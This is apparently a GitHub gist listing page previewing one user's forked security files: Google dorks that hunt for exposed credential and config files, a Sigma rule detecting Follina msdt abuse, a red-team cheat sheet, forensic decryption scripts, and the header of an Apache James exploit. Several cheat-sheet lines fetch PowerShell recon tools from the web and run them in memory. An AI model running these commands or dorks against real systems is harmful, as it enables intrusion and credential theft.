Original Source: https://securitytrails.com/blog/google-hacking-techniques
Reading time: 12 minutes
Some time ago we wrote an interesting post about the [OSINT](https://securitytrails.com/blog/what
Adewale Mustapha walexzzy
walexzzy
/ google-hacking-techniques.md
Created
June 15, 2022 11:49
— forked from viniciusdaniel/google-hacking-techniques.md
COPY - Exploring Google Hacking Techniques
walexzzy
/ GoogleHackMasterList.txt
Created
June 15, 2022 11:48
— forked from rmusser01/GoogleHackMasterList.txt
The definitive super list for "Google Hacking".
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| admin account info" filetype:log | |
| !Host=*.* intext:enc_UserPassword=* ext:pcf | |
| "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd | |
| "AutoCreate=TRUE password=*" | |
| "http://*:*@www” domainname | |
| "index of/" "ws_ftp.ini" "parent directory" | |
| "liveice configuration file" ext:cfg -site:sourceforge.net | |
| "parent directory" +proftpdpasswd | |
| Duclassified" -site:duware.com "DUware All Rights reserved" | |
| duclassmate" -site:duware.com |
walexzzy
/ suspicious_msdt_execution.yml
Created
June 3, 2022 07:59
— forked from embee-research/suspicious_msdt_execution.yml
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| title: Suspicious msdt.exe execution - Office Exploit | |
| id: 97a80ed7-1f3f-4d05-9ef4-65760e634f6b | |
| status: experimental | |
| description: This rule will monitor suspicious arguments passed to the msdt.exe process. These arguments are an indicator of recent Office/Msdt exploitation. | |
| references: | |
| - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e | |
| - https://twitter.com/MalwareJake/status/1531019243411623939 | |
| author: 'Matthew Brennan' | |
| tags: | |
| - attack.execution |
walexzzy
/ RedTeam_CheatSheet.ps1
Created
February 26, 2022 20:37
— forked from m8sec/RedTeam_CheatSheet.ps1
Red Team CheatSheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
walexzzy
/ w10pfdecomp.py
Created
August 9, 2021 16:11
— forked from dfirfpi/w10pfdecomp.py
Windows 10 Prefetch (native) Decompress
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| # | |
| # Copyright 2015, Francesco "dfirfpi" Picasso <[email protected]> | |
| # | |
| # Licensed under the Apache License, Version 2.0 (the "License"); | |
| # you may not use this file except in compliance with the License. | |
| # You may obtain a copy of the License at | |
| # | |
| # http://www.apache.org/licenses/LICENSE-2.0 |
walexzzy
/ unssz.py
Created
August 9, 2021 16:11
— forked from dfirfpi/unssz.py
Decrypt Samsung / Seagate Secure Zone crypto container (without knowing the password... uao...).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| # | |
| # Copyright 2017, Francesco "dfirfpi" Picasso <[email protected]> | |
| # | |
| # Licensed under the Apache License, Version 2.0 (the "License"); | |
| # you may not use this file except in compliance with the License. | |
| # You may obtain a copy of the License at | |
| # | |
| # http://www.apache.org/licenses/LICENSE-2.0 |
walexzzy
/ installing_dlib_on_macos_for_python.md
Created
April 27, 2019 04:21
— forked from ageitgey/installing_dlib_on_macos_for_python.md
Pre-reqs:
- Have Python 3 installed. On macOS, this could be installed from homebrew or even via standard Python 3.6 downloaded installer from https://www.python.org/download. On Linux, just use your package manager.
- On macOS:
- Install XCode from the Mac App Store (or install the XCode command line utils).
- Have homebrew installed
- On Linux:
walexzzy
/ apache-james-exploit.py
Created
January 14, 2018 13:28
— forked from kjiwa/apache-james-exploit.py
An exploit for Apache James 2.3.2 that executes remote commands. https://crimsonglow.ca/~kjiwa/#/exploiting-apache-james
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """An exploit for Apache James 2.3.2 that executes remote commands. | |
| This script creates a new user and enqueues a payload to be executed the next | |
| time a user logs in to the machine. The vulnerability is documented in | |
| CVE-2015-7611. | |
| For more details, see http://www.securityfocus.com/bid/76933 and | |
| https://www.exploit-db.com/exploits/35513/. | |
| """ |
walexzzy
/ gist:e6f78c7699801c4aecb259d9c65fea3a
Created
November 12, 2017 17:59
— forked from FinlayDaG33k/gist:23a6134b1ad3e5f867a64219a374406e
Minergate-cli ubuntu installation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Run this command to install MG-CLI: | |
| sudo apt-get update && wget https://minergate.com/download/deb-cli -O minergate-cli.deb && sudo dpkg -i minergate-cli.deb | |
| to start miner (4 cores for BCN) use this command: | |
| minergate-cli -user <[email protected]> -bcn 4 | |
| Feel free to send some of your earnings to me: | |
| BTC (Don't attempt to send other coins to this address!): 17f77AYHsQbdsB1Q6BbqPahJ8ZrjFLYH2j |